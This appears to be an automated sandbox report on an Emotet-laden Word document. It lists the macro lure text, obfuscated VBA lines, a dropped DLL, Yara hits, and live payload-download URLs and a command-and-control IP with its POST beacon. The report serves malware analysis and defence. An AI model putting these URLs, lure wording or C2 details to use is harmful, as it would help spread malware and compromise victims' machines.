00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
                    Source: global trafficHTTP traffic detected: GET /wp-admin/4m/ HTTP/1.1Host: petafilm.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 176.53.69.151 176.53.69.151
                    Source: Joe Sandbox ViewIP Address: 5.2.136.90 5.2.136.90
                    Source: Joe Sandbox ViewASN Name: RADORETR RADORETR
                    Source: Joe Sandbox ViewASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO
                    Source: global trafficHTTP traffic detected: POST /76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/ HTTP/1.1DNT: 0Referer: 5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/Content-Type: multipart/form-data; boundary=--------------sArhAY1ugWdoQVUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 5940Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0024023A InternetReadFile,
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F52C8AA2-B174-499E-B3BD-E7523F18DF93}.tmpJump to behavior
                    Source: global trafficHTTP traffic detected: GET /wp-admin/4m/ HTTP/1.1Host: petafilm.comConnection: Keep-Alive
                    Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                    Source: unknownDNS traffic detected: queries for: petafilm.com
                    Source: unknownHTTP traffic detected: POST /76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/ HTTP/1.1DNT: 0Referer: 5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/Content-Type: multipart/form-data; boundary=--------------sArhAY1ugWdoQVUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 5940Connection: Keep-AliveCache-Control: no-cache
                    Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmpString found in binary or memory: http://givingthanksdaily.com/qlE/VeF/
                    Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                    Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                    Source: rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                    Source: rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                    Source: powershell.exe, 00000005.00000002.2106127906.0000000003B33000.00000004.00000001.sdmpString found in binary or memory: http://petafilm.com
                    Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmpString found in binary or memory: http://petafilm.com/wp-admin/4m/
                    Source: powershell.exe, 00000005.00000002.2098095500.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105644253.00000000028E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106881102.0000000002890000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                    Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmpString found in binary or memory: http://wap.zhonglisc.com/wp-includes/QryCB/
                    Source: rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                    Source: powershell.exe, 00000005.00000002.2098095500.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105644253.00000000028E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106881102.0000000002890000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                    Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                    Source: rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                    Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                    Source: powershell.exe, 00000005.00000002.2096126054.00000000003C4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/cclea;
                    Source: powershell.exe, 00000005.00000002.2096126054.00000000003C4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                    Source: rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                    Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmpString found in binary or memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
                    Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmpString found in binary or memory: https://fnjbq.com/wp-includes/rlR/
                    Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmpString found in binary or memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
                    Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmpString found in binary or memory: https://somanap.com/wp-admin/P/

                    E-Banking Fraud:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2102461185.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2100426425.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2347096157.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2103478043.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2105397432.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 8.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE

                    System Summary:

                    barindex
                    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
                    Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                    Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 3 N@m 13 ;a 10096 G)
                    Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a
                    Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                    Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a
                    Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                    Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                    Document contains an embedded VBA macro with suspicious stringsShow sources
                    Source: pack 2254794.docOLE, VBA macro line: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
                    Source: pack 2254794.docOLE, VBA macro line: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
                    Source: pack 2254794.docOLE, VBA macro line: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
                    Source: pack 2254794.docOLE, VBA macro line: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
                    Source: pack 2254794.docOLE, VBA macro line: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
                    Source: pack 2254794.docOLE, VBA macro line: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
                    Source: pack 2254794.docOLE, VBA macro line: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
                    Source: pack 2254794.docOLE, VBA macro line: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
                    Source: pack 2254794.docOLE, VBA macro line: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
                    Source: pack 2254794.docOLE, VBA macro line: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
                    Source: pack 2254794.docOLE, VBA macro line: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
                    Source: pack 2254794.docOLE, VBA macro line: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
                    Source: pack 2254794.docOLE, VBA macro line: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
                    Source: pack 2254794.docOLE, VBA macro line: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
                    Source: pack 2254794.docOLE, VBA macro line: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
                    Source: pack 2254794.docOLE, VBA macro line: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
                    Source: pack 2254794.docOLE, VBA macro line: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
                    Source: pack 2254794.docOLE, VBA macro line: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
                    Document contains an embedded VBA with base64 encoded stringsShow sources
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String vRrzDEngIQvFPJfE
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String kWzGMzIVefGB
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String TthascRlxHZH
                    Source: VBA code instrumentationOLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String utFMeJhUKJhJ
                    Powershell drops PE fileShow sources
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dllJump to dropped file
                    Very long command line foundShow sources
                    Source: unknownProcess created: Commandline size = 5293
                    Source: unknownProcess created: Commandline size = 5197
                    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5197
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Vgmfknuplwnwb\Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000976F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024B41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00242C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00253895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024C0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024EE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002502C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002542DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00248736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00247B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00254B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024F444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024E05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025A0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002448BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002460B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002480BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002488E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00241CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002520C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024F536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00250D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00257D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024B112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00255D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00258D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002469A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00256DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002561B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00259586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024F98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00246D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00247998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002531E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002571EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00244A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00249A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00242A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00257A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00255A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024EA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002462A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00241280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002512E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002526F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002496CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00258ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024BB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00250F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00252B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00257F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024C769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00250B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024E377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00251773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00248F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00245B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00259B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00252349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00258F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00246754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024B75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002417AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002573AC
